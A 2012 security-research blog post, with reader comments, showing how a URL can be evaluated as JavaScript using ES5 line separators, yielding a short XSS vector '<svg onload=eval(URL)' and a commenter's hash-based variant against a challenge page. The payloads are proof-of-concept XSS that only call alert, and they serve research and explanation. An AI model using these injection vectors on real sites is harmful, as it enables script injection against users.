Eval a url
Tuesday, 8 May 2012
You might have seen a blog post or came to the conclusion that urls are in fact valid JavaScript such as:
http://thespanner.co.uk
(label) (comment)
That’s weird and cool but how do we execute JavaScript from the url? Something like:
http://thespanner.co.uk\nalert(1)
(label) (comment) (newLine) (functionCall)
Trouble is the new line isn’t allowed inside the browser url bar or is it? ES5 introduced in the standard that line separators and paragraph separators would act as traditional new lines in JavaScript and separate new statements. Thankfully our friend IE allows us to do this directly in the url. Using these characters allows you to create an eval’able url.
So now we don’t need to do eval(location.hash.slice(1)) we can simply do eval(location) 🙂 I found this while discussing with Mario and Yosuke Hasegawa on what the shortest HTML based XSS injection was. Using this technique it’s probably 21 (without using netscape 4).
<svg onload=eval(URL)
You of course must pass your JavaScript as a non-existent query param such as:
&
alert(1)
Update…
As Stefano Di Paola points out, using hash will allow you to use this technique on Chrome and Opera.
No. 1 — May 8th, 2012 at 11:25 am
very nice Gareth!
About the update:
according to:
http://code.google.com/p/domxsswiki/wiki/LocationSources
chrome, opera and IE URL object sees unencoded chars > 127 when in the hash part so the new vector:
location.href=”http://challenge.hackvertor.co.uk/?challenge=1&input=<svg%20onload=eval(URL)#&\u2029alert('I win!')";
will work on IE, Chrome and Opera.
No. 2 — May 8th, 2012 at 11:36 am
Very nice 🙂 shame about Firefox hmmm can we make it work there too